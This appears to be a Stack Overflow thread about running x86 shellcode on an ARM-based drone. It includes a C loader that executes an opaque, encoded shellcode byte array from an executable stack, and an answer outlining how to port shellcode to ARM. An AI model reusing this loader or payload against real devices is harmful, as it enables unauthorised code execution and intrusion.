# cross compiling shellcode to arm

Tags: c, compilation, arm, elf, shellcode

I am working on a project where I need to execute some shellcode on a drone running linux on a 32 bit arm processor. I can communicate with the drone via telnet with the standard busybox shell, so I can't execute many complex commands, so no compiling on the drone itself. I am able to transfer and execute a helloworld program I cross compiled with "arm-linux-gnueabi-gcc". Now here's the problem: when I try to do exactly the same thing with my x86 shellcode c program, I get the error `Illegal instruction` after running it on the drone.

My c program looks as follows:

```
#include <string.h>
#include <stdio.h>

unsigned char code[] = 
"\xbe\xc6\xfe\xae\xa9\xd9\xea\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"
"\x1f\x83\xc3\x04\x31\x73\x11\x03\x73\x11\xe2\x33\x94\xa4\xf7"
"\x8a\xb2\x4e\xe4\xbf\x07\xe2\x81\x3d\x38\x62\xdf\xa0\xf5\xeb"
"\x48\x79\x6e\x2c\xde\xbd\x5d\xc4\x1d\x3d\xb3\x48\xab\xdc\xd9"
"\x16\xf3\x4e\x4f\x80\x8a\x8f\x2c\xe3\x0d\xca\x73\x82\x14\x9a"
"\x07\x48\x4f\x80\xe8\xb2\x8f\x9c\x82\xb2\xe5\x19\xda\x50\xc8"
"\xe8\x11\x16\xae\x2a\xd0\xaa\x5a\x8d\x91\xd2\x25\xd1\xc5\xdc"
"\x55\x58\x06\x1d\xbe\x56\x08\x7d\x4d\xd6\xf7\x4f\xce\x93\xc8"
"\x28\xdf\xc0\x41\x29\x46\x40\x5d\x1a\x7a\x61\xde\xdf\xbd\x01"
"\xdd\x20\xdc\x49\xe0\xde\x1f\xa9\x58\xdf\x1f\xa9\x9e\x2d\x9f";


int main(int argc, char **argv) {
  int foo_value = 0;

  int (*foo)() = (int(*)())code;
  foo_value = foo();

  printf("%d\n", foo_value);
}
```

I have compiled this code with the command: `arm-linux-gnueabi-gcc -fno-stack-protector -z execstack cprogram.c -o output.elf`. And the "file" command outputs:

```
output.elf: ELF 32-bit LSB pie executable ARM, EABI5 version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.3, for GNU/Linux 3.2.0, BuildID[sha1]=43757152cbcf40dcc6a75cf210c156332557b575, not stripped
```

Which looks normal to me. This exact same code runs fine on my 64 bit linux machine when compiled as a 32 bit executable. I have removed the x00 instructions from the shellcode, I am not sure if there are more bad characters which need to be removed. So my question is: what causes this error and what would be a way to be able to execute this code correctly on the arm processor. Thanks!

Comment: The `code` looks CPU instructions but why do you expect these instructions which worked on ARM CPU are still workable on an X86 CPU?

Comment: It's actually the other way around, my code worked on an x86 cpu and I'm trying to execute on an arm cpu. I realise now this couldn't work. Is there a way to convert these instructions to work on an ARM cpu?

Comment: I know [qemu] (https://www.qemu.org/) which is a "*generic and open source machine emulator and virtualizer*" but not sure if it is what you expect. Also I doubt if this is worth since the instruction code size is small, why not disassemble them and maybe (just maybe) reverse engineering to re-implement it for other CPU?

Comment: I'm not really experienced enough to reverse engineer it myself, but I eventually found some ARM shellcode for what I was trying to do. Thanks anyways!

Answer (score 0, accepted):

> `unsigned char code[] =`
>   `"\xbe\xc6\xfe\xae\xa9\xd9\xea\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"`

That code is *x86* machine instructions.

*Of course* they wouldn't run on an ARM processor, what *else* did you expect?

You must find the source of that shell code (usually a tiny `.asm` file), translate that `.asm` from x86 to ARM assembly, and compile it to ARM `.o` file, and finally use `objdump -d` to get equivalent machine code for ARM.

Now put that machine code into the `code` array, rebuild the ARM executable, and enjoy.

P.S. You can likely find equivalent shell code for ARM, saving you some of the steps above.

Comment: Yeah thanks. When I made this post I thought x86 code could run on x64 processors so why not on ARM? I guess I'm just a little stupid.